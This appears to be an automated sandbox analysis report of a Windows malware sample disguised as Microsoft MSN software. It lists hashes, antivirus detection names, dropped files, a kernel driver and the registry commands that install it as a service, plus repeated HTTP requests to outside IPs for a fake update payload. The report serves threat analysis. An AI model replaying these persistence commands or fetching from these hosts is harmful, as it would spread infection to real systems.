Analysis Date: 2016-02-20 03:15:28
MD5: ad6225c5f0c7d5a8f11c8aca865dd990
SHA1: 87eb790f29d5551882452cb2d732df47b80ba95a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: d796e4ff5c4d9c5ca2d1b90272d6d6b8 sha1: 0755e4acb128a57a55d97d2e967825b0a5393d30 size: 65536
Section .data md5: 789f8dbcfc8423c0c1058375d02239bf sha1: f0b25955806641c0017dfcc1eaafd33c8c24a187 size: 4096
Section .rsrc md5: 95c3a4840354bf62ec32d7ce9f5c6cb2 sha1: 2b3cddb7b110e371697ebf99e4de9d01e8674e77 size: 4096
Section [cc md5: 05430e4a5e4a37feecf0a9eadb7240f8 sha1: 3c0a32551c70db5be0425fe0189178e2e1c0f0e4 size: 94208
Timestamp: 2001-07-19 19:30:07
Pdb path: pdb
Version:
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
Packer: Borland Delphi 3.0 (???)
PEhash: c3816c608d19378522b754b62b90aef1314770e3
IMPhash: 6df6e99bae10817058127898c796b82d
AV CA (E-Trust Ino): Win32.Viking.AZ
AV Rising: Win32.Cmt.b
AV Mcafee: W32/Fujacks.be
AV Avira (antivir): W32/Viking.AT
AV Twister: Virus.7DFCDC175595EB59
AV Ad-Aware: Win32.Viking.AZ
AV Alwil (avast): Win32:Malware-gen
AV Eset (nod32): Win32/Wapomi.A virus
AV Grisoft (avg): Win32/Wapomi.D
AV Symantec: W32.Wapomi!inf
AV Fortinet: W32/Krypt.C!tr.bdr
AV BitDefender: Win32.Viking.AZ
AV K7: Virus ( 700000081 )
AV Microsoft Security Essentials: Virus:Win32/Jadtre.F
AV MicroWorld (escan): Win32.Viking.AZ
AV MalwareBytes: Trojan.FakeMS.ED
AV Authentium: W32/Pikor.A
AV Emsisoft: Win32.Viking.AZ
AV Frisk (f-prot): W32/Pikor.A
AV Ikarus: Virus.Win32.Qvod
AV Zillya!: Virus.Qvod.Win32.4
AV Kaspersky: Virus.Win32.Qvod.a
AV Trend Micro: PE_PIKOR.A
AV VirusBlokAda (vba32): Virus.Win32.Qvod.a
AV CAT (quickheal): W32.Pikroms.A
AV BullGuard: Win32.Viking.AZ
AV Arcabit (arcavir): Win32.Viking.AZ
AV ClamAV: Virus.Qvod
AV Dr. Web: Trojan.Starter.1410
AV F-Secure: Win32.Viking.AZ

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\cmt.exe
Creates Process: C:\cmt.exe

Process
↳ C:\cmt.exe

Creates File: C:\WINDOWS\system32\appmgmts.dll
Creates File: PIPE\SfcApi
Creates File: C:\Documents and Settings\Infotmp.txt
Starts Service: AppMgmt

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt\Start ➝ 2
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates File: \Device\00000027
Creates File: \Device\00000025
Creates File: C:\WINDOWS\system32\drivers\1BBC6C10.sys
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\WINDOWS\TEMP\s2eec3e89.txt
Creates File: \Device\0000002F
Creates File: NewDev
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: \Device\0000002A
Creates File: \Device\00000026
Creates File: \Device\00000002
Creates File: \Device\00000003
Creates File: \Device\00000029
Creates File: \Device\00000028
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes File: C:\WINDOWS\TEMP\s2eec3e89.txt
Deletes File: C:\Documents and Settings\Infotmp.txt
Deletes File: C:\cmt.exe
Deletes File: C:\WINDOWS\TEMP\r6d48127a.txt
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v Service /t REG_SZ /d 1BBC6C10 /f
Creates Process: reg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt C:\WINDOWS\TEMP\r6d48127a.txt
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v ErrorControl /t REG_DWORD /d 1 /f
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v Type /t REG_DWORD /d 1 /f
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v Start /t REG_DWORD /d 2 /f
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v ConfigFlags /t REG_DWORD /d 0 /f
Creates Process: reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v ImagePath /t REG_EXPAND_SZ /d system32\drivers\1BBC6C10.sys /f

Process
↳ Pid 1212

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝ NULL
Creates File: WMIDataDevice

Process
↳ Pid 1872

Process
↳ Pid 1160

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v Service /t REG_SZ /d 1BBC6C10 /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}\Service ➝ 1BBC6C10\\x00

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641} /v ConfigFlags /t REG_DWORD /d 0 /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SW\{eec12db6-ad9c-4168-8658-b03daef417fe}\{ABD61E00-9350-47e2-A632-4438B90C6641}\ConfigFlags ➝ NULL

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v Start /t REG_DWORD /d 2 /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1BBC6C10\Start ➝ 2

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v Type /t REG_DWORD /d 1 /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1BBC6C10\Type ➝ 1

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v ImagePath /t REG_EXPAND_SZ /d system32\drivers\1BBC6C10.sys /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1BBC6C10\ImagePath ➝ system32\drivers\1BBC6C10.sys\\x00

Process
↳ reg add HKLM\SYSTEM\CurrentControlSet\Services\1BBC6C10 /v ErrorControl /t REG_DWORD /d 1 /f

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1BBC6C10\ErrorControl ➝ 1

Process
↳ reg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt C:\WINDOWS\TEMP\r6d48127a.txt

Creates File: C:\WINDOWS\TEMP\r6d48127a.txt

Network Details:

DNS: www.a.shifen.com
Type: A
103.235.46.39
DNS: www.a.shifen.com
Type: A
103.235.46.39
DNS: 472146.parkingcrew.net
Type: A
185.53.177.30
DNS: 53.WAP517.NET
Type: A
193.166.255.171
DNS: www.baidu.com
Type: A
DNS: 53.WAP517.BIZ
Type: A
DNS: 53.WAP517.US
Type: A
DNS: 53.NS1631261.COM
Type: A
DNS: 53.NS1631262.COM
Type: A
DNS: 53.NS1631262.INFO
Type: A
DNS: 53.NS1631262.NET
Type: A
DNS: 53.NS1631262.ORG
Type: A
DNS: 53.NS1631263.COM
Type: A
DNS: 53.NS1631263.INFO
Type: A
DNS: 53.NS1631263.NET
Type: A
DNS: 53.NS1631263.ORG
Type: A
HTTP GET: http://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://185.53.177.30:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GET: http://193.166.255.171:8080/msdownload/update/v5/redir/wuredirt.rar
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP: 192.168.1.1:1032 ➝ 185.53.177.30:8080
Flows TCP: 192.168.1.1:1033 ➝ 193.166.255.171:8080
Flows TCP: 192.168.1.1:1034 ➝ 185.53.177.30:8080
Flows TCP: 192.168.1.1:1035 ➝ 193.166.255.171:8080
Flows TCP: 192.168.1.1:1036 ➝ 185.53.177.30:8080
Flows TCP: 192.168.1.1:1037 ➝ 193.166.255.171:8080
Flows TCP: 192.168.1.1:1038 ➝ 185.53.177.30:8080
Flows TCP: 192.168.1.1:1039 ➝ 193.166.255.171:8080
Flows TCP: 192.168.1.1:1040 ➝ 185.53.177.30:8080
Flows TCP: 192.168.1.1:1041 ➝ 193.166.255.171:8080

Raw Pcap
0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 38352e35 332e3137   .Host: 185.53.17
0x000000d0 (00208)   372e3330 0d0a436f 6e6e6563 74696f6e   7.30..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f6d7364 6f776e6c 6f61642f   GET /msdownload/
0x00000010 (00016)   75706461 74652f76 352f7265 6469722f   update/v5/redir/
0x00000020 (00032)   77757265 64697274 2e726172 20485454   wuredirt.rar HTT
0x00000030 (00048)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000040 (00064)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x00000050 (00080)   6167653a 207a682d 636e0d0a 41636365   age: zh-cn..Acce
0x00000060 (00096)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000070 (00112)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000080 (00128)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000090 (00144)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000a0 (00160)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000b0 (00176)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x000000c0 (00192)   0a486f73 743a2031 39332e31 36362e32   .Host: 193.166.2
0x000000d0 (00208)   35352e31 37310d0a 436f6e6e 65637469   55.171..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..


Strings